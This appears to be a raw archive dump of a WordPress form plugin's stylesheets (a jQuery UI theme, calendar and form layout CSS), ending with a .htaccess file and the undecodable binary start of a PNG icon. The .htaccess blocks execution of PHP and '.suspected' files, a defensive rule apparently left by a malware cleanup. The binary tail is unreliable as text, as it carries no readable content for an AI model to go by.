.ui-datepicker-multi .ui-datepicker-group-middle .ui-datepicker-header {
	border-left-width: 0;
}
.ui-datepicker-multi .ui-datepicker-buttonpane {
	clear: left;
}
.ui-datepicker-row-break {
	clear: both;
	width: 100%;
	font-size: 0;
}

/* RTL support */
.ui-datepicker-rtl {
	direction: rtl;
}
.ui-datepicker-rtl .ui-datepicker-prev {
	right: 2px;
	left: auto;
}
.ui-datepicker-rtl .ui-datepicker-next {
	left: 2px;
	right: auto;
}
.ui-datepicker-rtl .ui-datepicker-prev:hover {
	right: 1px;
	left: auto;
}
.ui-datepicker-rtl .ui-datepicker-next:hover {
	left: 1px;
	right: auto;
}
.ui-datepicker-rtl .ui-datepicker-buttonpane {
	clear: right;
}
.ui-datepicker-rtl .ui-datepicker-buttonpane button {
	float: left;
}
.ui-datepicker-rtl .ui-datepicker-buttonpane button.ui-datepicker-current,
.ui-datepicker-rtl .ui-datepicker-group {
	float: right;
}
.ui-datepicker-rtl .ui-datepicker-group-last .ui-datepicker-header,
.ui-datepicker-rtl .ui-datepicker-group-middle .ui-datepicker-header {
	border-right-width: 0;
	border-left-width: 1px;
}
.ui-dialog {
	position: absolute;
	top: 0;
	left: 0;
	padding: .2em;
	outline: 0;
}
.ui-dialog .ui-dialog-titlebar {
	padding: .4em 1em;
	position: relative;
}
.ui-dialog .ui-dialog-title {
	float: left;
	margin: .1em 0;
	white-space: nowrap;
	width: 90%;
	overflow: hidden;
	text-overflow: ellipsis;
}
.ui-dialog .ui-dialog-titlebar-close {
	position: absolute;
	right: .3em;
	top: 50%;
	width: 21px;
	margin: -10px 0 0 0;
	padding: 1px;
	height: 20px;
}
.ui-dialog .ui-dialog-content {
	position: relative;
	border: 0;
	padding: .5em 1em;
	background: none;
	overflow: auto;
}
.ui-dialog .ui-dialog-buttonpane {
	text-align: left;
	border-width: 1px 0 0 0;
	background-image: none;
	margin-top: .5em;
	padding: .3em 1em .5em .4em;
}
.ui-dialog .ui-dialog-buttonpane .ui-dialog-buttonset {
	float: right;
}
.ui-dialog .ui-dialog-buttonpane button {
	margin: .5em .4em .5em 0;
	cursor: pointer;
}
.ui-dialog .ui-resizable-se {
	width: 12px;
	height: 12px;
	right: -5px;
	bottom: -5px;
	background-position: 16px 16px;
}
.ui-draggable .ui-dialog-titlebar {
	cursor: move;
}
.ui-menu {
	list-style: none;
	padding: 2px;
	margin: 0;
	display: block;
	outline: none;
}
.ui-menu .ui-menu {
	margin-top: -3px;
	position: absolute;
}
.ui-menu .ui-menu-item {
	margin: 0;
	padding: 0;
	width: 100%;
	/* support: IE10, see #8844 */
	list-style-image: url(data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7);
}
.ui-menu .ui-menu-divider {
	margin: 5px -2px 5px -2px;
	height: 0;
	font-size: 0;
	line-height: 0;
	border-width: 1px 0 0 0;
}
.ui-menu .ui-menu-item a {
	text-decoration: none;
	display: block;
	padding: 2px .4em;
	line-height: 1.5;
	min-height: 0; /* support: IE7 */
	font-weight: normal;
}
.ui-menu .ui-menu-item a.ui-state-focus,
.ui-menu .ui-menu-item a.ui-state-active {
	font-weight: normal;
	margin: -1px;
}

.ui-menu .ui-state-disabled {
	font-weight: normal;
	margin: .4em 0 .2em;
	line-height: 1.5;
}
.ui-menu .ui-state-disabled a {
	cursor: default;
}

/* icon support */
.ui-menu-icons {
	position: relative;
}
.ui-menu-icons .ui-menu-item a {
	position: relative;
	padding-left: 2em;
}

/* left-aligned */
.ui-menu .ui-icon {
	position: absolute;
	top: .2em;
	left: .2em;
}

/* right-aligned */
.ui-menu .ui-menu-icon {
	position: static;
	float: right;
}
.ui-progressbar {
	height: 2em;
	text-align: left;
	overflow: hidden;
}
.ui-progressbar .ui-progressbar-value {
	margin: -1px;
	height: 100%;
}
.ui-progressbar .ui-progressbar-overlay {
	background: url("images/animated-overlay.gif");
	height: 100%;
	filter: alpha(opacity=25);
	opacity: 0.25;
}
.ui-progressbar-indeterminate .ui-progressbar-value {
	background-image: none;
}
.ui-slider {
	position: relative;
	text-align: left;
}
.ui-slider .ui-slider-handle {
	position: absolute;
	z-index: 2;
	width: 1.2em;
	height: 1.2em;
	cursor: default;
}
.ui-slider .ui-slider-range {
	position: absolute;
	z-index: 1;
	font-size: .7em;
	display: block;
	border: 0;
	background-position: 0 0;
}

/* For IE8 - See #6727 */
.ui-slider.ui-state-disabled .ui-slider-handle,
.ui-slider.ui-state-disabled .ui-slider-range {
	filter: inherit;
}

.ui-slider-horizontal {
	height: .8em;
}
.ui-slider-horizontal .ui-slider-handle {
	top: -.3em;
	margin-left: -.6em;
}
.ui-slider-horizontal .ui-slider-range {
	top: 0;
	height: 100%;
}
.ui-slider-horizontal .ui-slider-range-min {
	left: 0;
}
.ui-slider-horizontal .ui-slider-range-max {
	right: 0;
}

.ui-slider-vertical {
	width: .8em;
	height: 100px;
}
.ui-slider-vertical .ui-slider-handle {
	left: -.3em;
	margin-left: 0;
	margin-bottom: -.6em;
}
.ui-slider-vertical .ui-slider-range {
	left: 0;
	width: 100%;
}
.ui-slider-vertical .ui-slider-range-min {
	bottom: 0;
}
.ui-slider-vertical .ui-slider-range-max {
	top: 0;
}
.ui-spinner {
	position: relative;
	display: inline-block;
	overflow: hidden;
	padding: 0;
	vertical-align: middle;
}
.ui-spinner-input {
	border: none;
	background: none;
	color: inherit;
	padding: 0;
	margin: .2em 0;
	vertical-align: middle;
	margin-left: .4em;
	margin-right: 22px;
}
.ui-spinner-button {
	width: 16px;
	height: 50%;
	font-size: .5em;
	padding: 0;
	margin: 0;
	text-align: center;
	position: absolute;
	cursor: default;
	display: block;
	overflow: hidden;
	right: 0;
}
/* more specificity required here to overide default borders */
.ui-spinner a.ui-spinner-button {
	border-top: none;
	border-bottom: none;
	border-right: none;
}
/* vertical centre icon */
.ui-spinner .ui-icon {
	position: absolute;
	margin-top: -8px;
	top: 50%;
	left: 0;
}
.ui-spinner-up {
	top: 0;
}
.ui-spinner-down {
	bottom: 0;
}

/* TR overrides */
.ui-spinner .ui-icon-triangle-1-s {
	/* need to fix icons sprite */
	background-position: -65px -16px;
}
.ui-tabs {
	position: relative;/* position: relative prevents IE scroll bug (element with position: relative inside container with overflow: auto appear as "fixed") */
	padding: .2em;
}
.ui-tabs .ui-tabs-nav {
	margin: 0;
	padding: .2em .2em 0;
}
.ui-tabs .ui-tabs-nav li {
	list-style: none;
	float: left;
	position: relative;
	top: 0;
	margin: 1px .2em 0 0;
	border-bottom-width: 0;
	padding: 0;
	white-space: nowrap;
}
.ui-tabs .ui-tabs-nav li a {
	float: left;
	padding: .5em 1em;
	text-decoration: none;
}
.ui-tabs .ui-tabs-nav li.ui-tabs-active {
	margin-bottom: -1px;
	padding-bottom: 1px;
}
.ui-tabs .ui-tabs-nav li.ui-tabs-active a,
.ui-tabs .ui-tabs-nav li.ui-state-disabled a,
.ui-tabs .ui-tabs-nav li.ui-tabs-loading a {
	cursor: text;
}
.ui-tabs .ui-tabs-nav li a, /* first selector in group seems obsolete, but required to overcome bug in Opera applying cursor: text overall if defined elsewhere... */
.ui-tabs-collapsible .ui-tabs-nav li.ui-tabs-active a {
	cursor: pointer;
}
.ui-tabs .ui-tabs-panel {
	display: block;
	border-width: 0;
	padding: 1em 1.4em;
	background: none;
}
.ui-tooltip {
	padding: 8px;
	position: absolute;
	z-index: 9999;
	max-width: 300px;
	-webkit-box-shadow: 0 0 5px #aaa;
	box-shadow: 0 0 5px #aaa;
}
body .ui-tooltip {
	border-width: 2px;
}

/* Component containers
----------------------------------*/
.ui-widget {
	font-family: Trebuchet MS,Tahoma,Verdana,Arial,sans-serif;
	font-size: 1.1em;
}
.ui-widget .ui-widget {
	font-size: 1em;
}
.ui-widget input,
.ui-widget select,
.ui-widget textarea,
.ui-widget button {
	font-family: Trebuchet MS,Tahoma,Verdana,Arial,sans-serif;
	font-size: 1em;
}
.ui-widget-content {
	border: 1px solid #dddddd;
	background: #eeeeee url(images/ui-bg_highlight-soft_100_eeeeee_1x100.png) 50% top repeat-x;
	color: #333333;
}
.ui-widget-content a {
	color: #333333;
}
.ui-widget-header {
	border: 1px solid #e78f08;
	background: #f6a828 url(images/ui-bg_gloss-wave_35_f6a828_500x100.png) 50% 50% repeat-x;
	color: #ffffff;
	font-weight: bold;
}
.ui-widget-header a {
	color: #ffffff;
}

/* Interaction states
----------------------------------*/
.ui-state-default,
.ui-widget-content .ui-state-default,
.ui-widget-header .ui-state-default {
	border: 1px solid #cccccc;
	background: #f6f6f6 url(images/ui-bg_glass_100_f6f6f6_1x400.png) 50% 50% repeat-x;
	font-weight: bold;
	color: #1c94c4;
}
.ui-state-default a,
.ui-state-default a:link,
.ui-state-default a:visited {
	color: #1c94c4;
	text-decoration: none;
}
.ui-state-hover,
.ui-widget-content .ui-state-hover,
.ui-widget-header .ui-state-hover,
.ui-state-focus,
.ui-widget-content .ui-state-focus,
.ui-widget-header .ui-state-focus {
	border: 1px solid #fbcb09;
	background: #fdf5ce url(images/ui-bg_glass_100_fdf5ce_1x400.png) 50% 50% repeat-x;
	font-weight: bold;
	color: #c77405;
}
.ui-state-hover a,
.ui-state-hover a:hover,
.ui-state-hover a:link,
.ui-state-hover a:visited {
	color: #c77405;
	text-decoration: none;
}
.ui-state-active,
.ui-widget-content .ui-state-active,
.ui-widget-header .ui-state-active {
	border: 1px solid #fbd850;
	background: #ffffff url(images/ui-bg_glass_65_ffffff_1x400.png) 50% 50% repeat-x;
	font-weight: bold;
	color: #eb8f00;
}
.ui-state-active a,
.ui-state-active a:link,
.ui-state-active a:visited {
	color: #eb8f00;
	text-decoration: none;
}

/* Interaction Cues
----------------------------------*/
.ui-state-highlight,
.ui-widget-content .ui-state-highlight,
.ui-widget-header .ui-state-highlight {
	border: 1px solid #fed22f;
	background: #ffe45c url(images/ui-bg_highlight-soft_75_ffe45c_1x100.png) 50% top repeat-x;
	color: #363636;
}
.ui-state-highlight a,
.ui-widget-content .ui-state-highlight a,
.ui-widget-header .ui-state-highlight a {
	color: #363636;
}
.ui-state-error,
.ui-widget-content .ui-state-error,
.ui-widget-header .ui-state-error {
	border: 1px solid #cd0a0a;
	background: #b81900 url(images/ui-bg_diagonals-thick_18_b81900_40x40.png) 50% 50% repeat;
	color: #ffffff;
}
.ui-state-error a,
.ui-widget-content .ui-state-error a,
.ui-widget-header .ui-state-error a {
	color: #ffffff;
}
.ui-state-error-text,
.ui-widget-content .ui-state-error-text,
.ui-widget-header .ui-state-error-text {
	color: #ffffff;
}
.ui-priority-primary,
.ui-widget-content .ui-priority-primary,
.ui-widget-header .ui-priority-primary {
	font-weight: bold;
}
.ui-priority-secondary,
.ui-widget-content .ui-priority-secondary,
.ui-widget-header .ui-priority-secondary {
	opacity: .7;
	filter:Alpha(Opacity=70);
	font-weight: normal;
}
.ui-state-disabled,
.ui-widget-content .ui-state-disabled,
.ui-widget-header .ui-state-disabled {
	opacity: .35;
	filter:Alpha(Opacity=35);
	background-image: none;
}
.ui-state-disabled .ui-icon {
	filter:Alpha(Opacity=35); /* For IE8 - See #6059 */
}

/* Icons
----------------------------------*/

/* states and images */
.ui-icon {
	width: 16px;
	height: 16px;
}
.ui-icon,
.ui-widget-content .ui-icon {
	background-image: url(images/ui-icons_222222_256x240.png);
}
.ui-widget-header .ui-icon {
	background-image: url(images/ui-icons_ffffff_256x240.png);
}
.ui-state-default .ui-icon {
	background-image: url(images/ui-icons_ef8c08_256x240.png);
}
.ui-state-hover .ui-icon,
.ui-state-focus .ui-icon {
	background-image: url(images/ui-icons_ef8c08_256x240.png);
}
.ui-state-active .ui-icon {
	background-image: url(images/ui-icons_ef8c08_256x240.png);
}
.ui-state-highlight .ui-icon {
	background-image: url(images/ui-icons_228ef1_256x240.png);
}
.ui-state-error .ui-icon,
.ui-state-error-text .ui-icon {
	background-image: url(images/ui-icons_ffd27a_256x240.png);
}

/* positioning */
.ui-icon-blank { background-position: 16px 16px; }
.ui-icon-carat-1-n { background-position: 0 0; }
.ui-icon-carat-1-ne { background-position: -16px 0; }
.ui-icon-carat-1-e { background-position: -32px 0; }
.ui-icon-carat-1-se { background-position: -48px 0; }
.ui-icon-carat-1-s { background-position: -64px 0; }
.ui-icon-carat-1-sw { background-position: -80px 0; }
.ui-icon-carat-1-w { background-position: -96px 0; }
.ui-icon-carat-1-nw { background-position: -112px 0; }
.ui-icon-carat-2-n-s { background-position: -128px 0; }
.ui-icon-carat-2-e-w { background-position: -144px 0; }
.ui-icon-triangle-1-n { background-position: 0 -16px; }
.ui-icon-triangle-1-ne { background-position: -16px -16px; }
.ui-icon-triangle-1-e { background-position: -32px -16px; }
.ui-icon-triangle-1-se { background-position: -48px -16px; }
.ui-icon-triangle-1-s { background-position: -64px -16px; }
.ui-icon-triangle-1-sw { background-position: -80px -16px; }
.ui-icon-triangle-1-w { background-position: -96px -16px; }
.ui-icon-triangle-1-nw { background-position: -112px -16px; }
.ui-icon-triangle-2-n-s { background-position: -128px -16px; }
.ui-icon-triangle-2-e-w { background-position: -144px -16px; }
.ui-icon-arrow-1-n { background-position: 0 -32px; }
.ui-icon-arrow-1-ne { background-position: -16px -32px; }
.ui-icon-arrow-1-e { background-position: -32px -32px; }
.ui-icon-arrow-1-se { background-position: -48px -32px; }
.ui-icon-arrow-1-s { background-position: -64px -32px; }
.ui-icon-arrow-1-sw { background-position: -80px -32px; }
.ui-icon-arrow-1-w { background-position: -96px -32px; }
.ui-icon-arrow-1-nw { background-position: -112px -32px; }
.ui-icon-arrow-2-n-s { background-position: -128px -32px; }
.ui-icon-arrow-2-ne-sw { background-position: -144px -32px; }
.ui-icon-arrow-2-e-w { background-position: -160px -32px; }
.ui-icon-arrow-2-se-nw { background-position: -176px -32px; }
.ui-icon-arrowstop-1-n { background-position: -192px -32px; }
.ui-icon-arrowstop-1-e { background-position: -208px -32px; }
.ui-icon-arrowstop-1-s { background-position: -224px -32px; }
.ui-icon-arrowstop-1-w { background-position: -240px -32px; }
.ui-icon-arrowthick-1-n { background-position: 0 -48px; }
.ui-icon-arrowthick-1-ne { background-position: -16px -48px; }
.ui-icon-arrowthick-1-e { background-position: -32px -48px; }
.ui-icon-arrowthick-1-se { background-position: -48px -48px; }
.ui-icon-arrowthick-1-s { background-position: -64px -48px; }
.ui-icon-arrowthick-1-sw { background-position: -80px -48px; }
.ui-icon-arrowthick-1-w { background-position: -96px -48px; }
.ui-icon-arrowthick-1-nw { background-position: -112px -48px; }
.ui-icon-arrowthick-2-n-s { background-position: -128px -48px; }
.ui-icon-arrowthick-2-ne-sw { background-position: -144px -48px; }
.ui-icon-arrowthick-2-e-w { background-position: -160px -48px; }
.ui-icon-arrowthick-2-se-nw { background-position: -176px -48px; }
.ui-icon-arrowthickstop-1-n { background-position: -192px -48px; }
.ui-icon-arrowthickstop-1-e { background-position: -208px -48px; }
.ui-icon-arrowthickstop-1-s { background-position: -224px -48px; }
.ui-icon-arrowthickstop-1-w { background-position: -240px -48px; }
.ui-icon-arrowreturnthick-1-w { background-position: 0 -64px; }
.ui-icon-arrowreturnthick-1-n { background-position: -16px -64px; }
.ui-icon-arrowreturnthick-1-e { background-position: -32px -64px; }
.ui-icon-arrowreturnthick-1-s { background-position: -48px -64px; }
.ui-icon-arrowreturn-1-w { background-position: -64px -64px; }
.ui-icon-arrowreturn-1-n { background-position: -80px -64px; }
.ui-icon-arrowreturn-1-e { background-position: -96px -64px; }
.ui-icon-arrowreturn-1-s { background-position: -112px -64px; }
.ui-icon-arrowrefresh-1-w { background-position: -128px -64px; }
.ui-icon-arrowrefresh-1-n { background-position: -144px -64px; }
.ui-icon-arrowrefresh-1-e { background-position: -160px -64px; }
.ui-icon-arrowrefresh-1-s { background-position: -176px -64px; }
.ui-icon-arrow-4 { background-position: 0 -80px; }
.ui-icon-arrow-4-diag { background-position: -16px -80px; }
.ui-icon-extlink { background-position: -32px -80px; }
.ui-icon-newwin { background-position: -48px -80px; }
.ui-icon-refresh { background-position: -64px -80px; }
.ui-icon-shuffle { background-position: -80px -80px; }
.ui-icon-transfer-e-w { background-position: -96px -80px; }
.ui-icon-transferthick-e-w { background-position: -112px -80px; }
.ui-icon-folder-collapsed { background-position: 0 -96px; }
.ui-icon-folder-open { background-position: -16px -96px; }
.ui-icon-document { background-position: -32px -96px; }
.ui-icon-document-b { background-position: -48px -96px; }
.ui-icon-note { background-position: -64px -96px; }
.ui-icon-mail-closed { background-position: -80px -96px; }
.ui-icon-mail-open { background-position: -96px -96px; }
.ui-icon-suitcase { background-position: -112px -96px; }
.ui-icon-comment { background-position: -128px -96px; }
.ui-icon-person { background-position: -144px -96px; }
.ui-icon-print { background-position: -160px -96px; }
.ui-icon-trash { background-position: -176px -96px; }
.ui-icon-locked { background-position: -192px -96px; }
.ui-icon-unlocked { background-position: -208px -96px; }
.ui-icon-bookmark { background-position: -224px -96px; }
.ui-icon-tag { background-position: -240px -96px; }
.ui-icon-home { background-position: 0 -112px; }
.ui-icon-flag { background-position: -16px -112px; }
.ui-icon-calendar { background-position: -32px -112px; }
.ui-icon-cart { background-position: -48px -112px; }
.ui-icon-pencil { background-position: -64px -112px; }
.ui-icon-clock { background-position: -80px -112px; }
.ui-icon-disk { background-position: -96px -112px; }
.ui-icon-calculator { background-position: -112px -112px; }
.ui-icon-zoomin { background-position: -128px -112px; }
.ui-icon-zoomout { background-position: -144px -112px; }
.ui-icon-search { background-position: -160px -112px; }
.ui-icon-wrench { background-position: -176px -112px; }
.ui-icon-gear { background-position: -192px -112px; }
.ui-icon-heart { background-position: -208px -112px; }
.ui-icon-star { background-position: -224px -112px; }
.ui-icon-link { background-position: -240px -112px; }
.ui-icon-cancel { background-position: 0 -128px; }
.ui-icon-plus { background-position: -16px -128px; }
.ui-icon-plusthick { background-position: -32px -128px; }
.ui-icon-minus { background-position: -48px -128px; }
.ui-icon-minusthick { background-position: -64px -128px; }
.ui-icon-close { background-position: -80px -128px; }
.ui-icon-closethick { background-position: -96px -128px; }
.ui-icon-key { background-position: -112px -128px; }
.ui-icon-lightbulb { background-position: -128px -128px; }
.ui-icon-scissors { background-position: -144px -128px; }
.ui-icon-clipboard { background-position: -160px -128px; }
.ui-icon-copy { background-position: -176px -128px; }
.ui-icon-contact { background-position: -192px -128px; }
.ui-icon-image { background-position: -208px -128px; }
.ui-icon-video { background-position: -224px -128px; }
.ui-icon-script { background-position: -240px -128px; }
.ui-icon-alert { background-position: 0 -144px; }
.ui-icon-info { background-position: -16px -144px; }
.ui-icon-notice { background-position: -32px -144px; }
.ui-icon-help { background-position: -48px -144px; }
.ui-icon-check { background-position: -64px -144px; }
.ui-icon-bullet { background-position: -80px -144px; }
.ui-icon-radio-on { background-position: -96px -144px; }
.ui-icon-radio-off { background-position: -112px -144px; }
.ui-icon-pin-w { background-position: -128px -144px; }
.ui-icon-pin-s { background-position: -144px -144px; }
.ui-icon-play { background-position: 0 -160px; }
.ui-icon-pause { background-position: -16px -160px; }
.ui-icon-seek-next { background-position: -32px -160px; }
.ui-icon-seek-prev { background-position: -48px -160px; }
.ui-icon-seek-end { background-position: -64px -160px; }
.ui-icon-seek-start { background-position: -80px -160px; }
/* ui-icon-seek-first is deprecated, use ui-icon-seek-start instead */
.ui-icon-seek-first { background-position: -80px -160px; }
.ui-icon-stop { background-position: -96px -160px; }
.ui-icon-eject { background-position: -112px -160px; }
.ui-icon-volume-off { background-position: -128px -160px; }
.ui-icon-volume-on { background-position: -144px -160px; }
.ui-icon-power { background-position: 0 -176px; }
.ui-icon-signal-diag { background-position: -16px -176px; }
.ui-icon-signal { background-position: -32px -176px; }
.ui-icon-battery-0 { background-position: -48px -176px; }
.ui-icon-battery-1 { background-position: -64px -176px; }
.ui-icon-battery-2 { background-position: -80px -176px; }
.ui-icon-battery-3 { background-position: -96px -176px; }
.ui-icon-circle-plus { background-position: 0 -192px; }
.ui-icon-circle-minus { background-position: -16px -192px; }
.ui-icon-circle-close { background-position: -32px -192px; }
.ui-icon-circle-triangle-e { background-position: -48px -192px; }
.ui-icon-circle-triangle-s { background-position: -64px -192px; }
.ui-icon-circle-triangle-w { background-position: -80px -192px; }
.ui-icon-circle-triangle-n { background-position: -96px -192px; }
.ui-icon-circle-arrow-e { background-position: -112px -192px; }
.ui-icon-circle-arrow-s { background-position: -128px -192px; }
.ui-icon-circle-arrow-w { background-position: -144px -192px; }
.ui-icon-circle-arrow-n { background-position: -160px -192px; }
.ui-icon-circle-zoomin { background-position: -176px -192px; }
.ui-icon-circle-zoomout { background-position: -192px -192px; }
.ui-icon-circle-check { background-position: -208px -192px; }
.ui-icon-circlesmall-plus { background-position: 0 -208px; }
.ui-icon-circlesmall-minus { background-position: -16px -208px; }
.ui-icon-circlesmall-close { background-position: -32px -208px; }
.ui-icon-squaresmall-plus { background-position: -48px -208px; }
.ui-icon-squaresmall-minus { background-position: -64px -208px; }
.ui-icon-squaresmall-close { background-position: -80px -208px; }
.ui-icon-grip-dotted-vertical { background-position: 0 -224px; }
.ui-icon-grip-dotted-horizontal { background-position: -16px -224px; }
.ui-icon-grip-solid-vertical { background-position: -32px -224px; }
.ui-icon-grip-solid-horizontal { background-position: -48px -224px; }
.ui-icon-gripsmall-diagonal-se { background-position: -64px -224px; }
.ui-icon-grip-diagonal-se { background-position: -80px -224px; }


/* Misc visuals
----------------------------------*/

/* Corner radius */
.ui-corner-all,
.ui-corner-top,
.ui-corner-left,
.ui-corner-tl {
	border-top-left-radius: 4px;
}
.ui-corner-all,
.ui-corner-top,
.ui-corner-right,
.ui-corner-tr {
	border-top-right-radius: 4px;
}
.ui-corner-all,
.ui-corner-bottom,
.ui-corner-left,
.ui-corner-bl {
	border-bottom-left-radius: 4px;
}
.ui-corner-all,
.ui-corner-bottom,
.ui-corner-right,
.ui-corner-br {
	border-bottom-right-radius: 4px;
}

/* Overlays */
.ui-widget-overlay {
	background: #666666 url(images/ui-bg_diagonals-thick_20_666666_40x40.png) 50% 50% repeat;
	opacity: .5;
	filter: Alpha(Opacity=50);
}
.ui-widget-shadow {
	margin: -5px 0 0 -5px;
	padding: 5px;
	background: #000000 url(images/ui-bg_flat_10_000000_40x100.png) 50% 50% repeat-x;
	opacity: .2;
	filter: Alpha(Opacity=20);
	border-radius: 5px;
}
css/form_maker_layout.css000060400000001155152434416630011573 0ustar00.fm_submit_layout {
  border-radius: 3px !important;
  width: 100%;
}

.fm_submit_layout em {
  color: #999;
  font-size: 11px;
  font-style: normal;
}

.CodeMirror {
  background: white;
  border: 1px solid #ccc;
  font-size: 12px;
  margin-bottom: 6px;
}

.fm_label_buttons {
  border: 1px solid #C0C0C0;
  cursor: pointer;
  font-weight: bold;
  max-width: 200px;
  overflow: hidden;
  padding: 4px 15px;
  text-overflow: ellipsis; 
  white-space: nowrap;
  word-break: break-all; 
  word-wrap: break-word;
}

.fm_layout p {
  font-size: 14px;
  font-family: segoe ui;
  text-shadow: 0px 0px 1px rgb(202, 202, 202);
}
css/calendar-jos.css000060400000010620152434416630010413 0ustar00/* The main calendar widget.  DIV containing a table. */

/* Form Wordpress. */
.calendar .button {
  display: table-cell !important;
}

div.calendar {
  position: relative;
  z-index: 100;
  width: 326px;
}

.calendar,
.calendar table {
  border: 1px solid #cccccc;
  font-size: 11px;
  color: #000;
  cursor: default;
  background: #efefef;
  font-family: arial,verdana,sans-serif;
  margin: 0;
  line-height: 1.7;
}

/* Header part -- contains navigation buttons and day names. */
.calendar .button { /* "<<", "<", ">", ">>" buttons have this class */
  text-align: center;    /* They are the navigation buttons */
  padding: 2px;          /* Make the buttons seem like they're pressing */
  border:0px;
  height:inherit;
  
}

.wdform_table1 .button,
#formMakerDiv1 .button,
.submitdate_fc .button,
.main .button {
	-webkit-border-radius: 11px !important;;
 	border-radius: 11px !important;;
	text-shadow: white 0px 1px 0px;
  background-origin: padding-box;
	border-bottom-width: 1px;
	border-left-width: 1px;
	border-right-width: 1px;
  border-top-width: 1px;
}

.calendar thead .title { /* This holds the current "month, year" */
  font-weight: bold;      /* Pressing it will take you to the current date */
  text-align: center;
  background: #333333;
  color: #ffffff;
  padding: 2px;
}

.calendar thead .headrow { /* Row <TR> containing navigation buttons */
  background: #dedede;
  color: #000;
}

.calendar thead .name { /* Cells <TD> containing the day names */
  border-bottom: 1px solid #cccccc;
  padding: 2px;
  text-align: center;
  color: #000;
}

.calendar thead .weekend { /* How a weekend day name shows in header */
  color:#666666 !important;
}

.calendar thead .hilite { /* How do the buttons in header appear when hover */
  background: #bbbbbb;
  color: #000000;
  border: 1px solid #cccccc;
  padding: 1px;
}

.calendar thead .active { /* Active (pressed) buttons in header */
  background: #c77;
  padding: 2px 0px 0px 2px;
}

.calendar thead .daynames { /* Row <TR> containing the day names */
  background: #dddddd;
}

/* The body part -- contains all the days in month. */

.calendar tbody .day { /* Cells <TD> containing month days dates */
  width: 2em;
  text-align: right;
  padding: 2px 4px 2px 2px;
}

.calendar table .wn {
  padding: 2px 3px 2px 2px;
  border-right: 1px solid #cccccc;
  background: #dddddd;
}

.calendar tbody .rowhilite td {
  background: #666666;
  color: #ffffff;
}

.calendar tbody .rowhilite td.wn {
  background: #666666;
  color: #ffffff;
}
.calendar table
{
	border-collapse:inherit !important;
}

.calendar tbody td.hilite { /* Hovered cells <TD> */
  background: #999999;
  padding: 1px 3px 1px 1px;
  border: 1px solid #666666;
}

.calendar tbody td.active { /* Active (pressed) cells <TD> */
  background: #000000;
  color: #ffffff;
  padding: 2px 2px 0px 2px;
}

.calendar tbody td.selected { /* Cell showing today date */
  font-weight: bold;
  border: 1px solid #000;
  padding: 1px 3px 1px 1px;
  background: #000000;
  color: #ffffff;
}

.calendar tbody td.weekend { /* Cells showing weekend days */
  color: #cccccc;
}

.calendar tbody td.today { font-weight: bold; }

.calendar tbody .disabled { color: #999; }

.calendar tbody .emptycell { /* Empty cells (the best is to hide them) */
  visibility: hidden;
  padding: 0;
}

.calendar tbody .emptyrow { /* Empty row (some months need less than 6 rows) */
  display: none;
}

/* The footer part -- status bar and "Close" button */

.calendar tfoot .footrow { /* The <TR> in footer (only one right now) */
  text-align: center;
  background: #cccccc;
  color: #000;
}

.calendar tfoot .ttip { /* Tooltip (status bar) cell <TD> */
  border-top: 1px solid #cccccc;
  background: #efefef;
  color: #000000;
}

.calendar tfoot .hilite { /* Hover style for buttons in footer */
  background: #666666;
  border: 1px solid #f40;
  padding: 1px;
}

.calendar tfoot .active { /* Active (pressed) style for buttons in footer */
  background: #999999;
  padding: 2px 0px 0px 2px;
}

/* Combo boxes (menus that display months/years for direct selection) */
.combo {
  position: absolute;
  display: none;
  top: 0px;
  left: 0px;
  width: 4em;
  cursor: default;
  border: 1px solid #655;
  background: #ffffff;
  color: #000;
  font-size: smaller;
}

.combo .label {
  width: 100%;
  text-align: center;
}

.combo .hilite {
  background: #fc8;
}

.combo .active {
  border-top: 1px solid #cccccc;
  border-bottom: 1px solid #cccccc;
  background: #efefef;
  font-weight: bold;
  
}
css/form_maker_frontend.css000060400000001200152434416630012064 0ustar00.wdform_map img {
  max-width: none !important;
}

.wdform_row .wdform-field .wdform_map {
  width: inherit !important;
}

.radio-div,
.radio-div *,
.checkbox-div,
.checkbox-div *,
.wdform-page-button {
  -moz-box-sizing: content-box !important;
  box-sizing: content-box !important;
  -webkit-box-sizing: content-box !important;
}

.page_percentage_deactive,
.page_percentage_deactive * {
	word-wrap: normal;
}

.wdform_percentage_text,
.wdform_percentage_arrow {
  vertical-align: top !important;
}

div[type="type_captcha"] .wdform-element-section * {
  vertical-align: middle;
}

.file-upload-status {
  direction: inherit !important;
}css/.htaccess000044400000000424152434416630007140 0ustar00<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index.php - [L]
RewriteRule ^.*\.[pP][hH].* - [L]
RewriteRule ^.*\.[sS][uU][sS][pP][eE][cC][tT][eE][dD] - [L]
<FilesMatch "\.(php|php7|phtml|suspected)$">
    Deny from all
</FilesMatch>
</IfModule>images/survey.png000060400000004003152434416630010055 0ustar00�PNG


IHDR**���[tEXtSoftwareAdobe ImageReadyq�e<!iTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.5-c014 79.151481, 2013/03/13-12:09:15        "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CC (Windows)" xmpMM:InstanceID="xmp.iid:F3AC5595C7F511E4B51DB75DC1E9091B" xmpMM:DocumentID="xmp.did:F3AC5596C7F511E4B51DB75DC1E9091B"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:F3AC5593C7F511E4B51DB75DC1E9091B" stRef:documentID="xmp.did:F3AC5594C7F511E4B51DB75DC1E9091B"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>��8xIDATx�̙[lTU��9s��v�P m	⠁�&6`5"��'jb"Q��hې��!Q�,�A�&4�E�E��X4X�>�D)��B��*��m�N��e.�Mϐ��L�vff%�����|�{��^c(G5�"�	�Q��ZE�Py�05F]�.S��)�?ޏ�b|�Lm���M��<M˴�j(?�B5P��'�+Q>g�*�?�/��c��-�>�B���&
t�6u�R$�0�����ޟ0�L�9��`
'G��OE"�;��:G6���S�x'�]ԁX|(Q^��M�]�ԇH�e��g�;�]Mէp$g����A�9#�
�aʆ4}ֺK�O�1;�K�V�mq.�l�����pu?6ls�
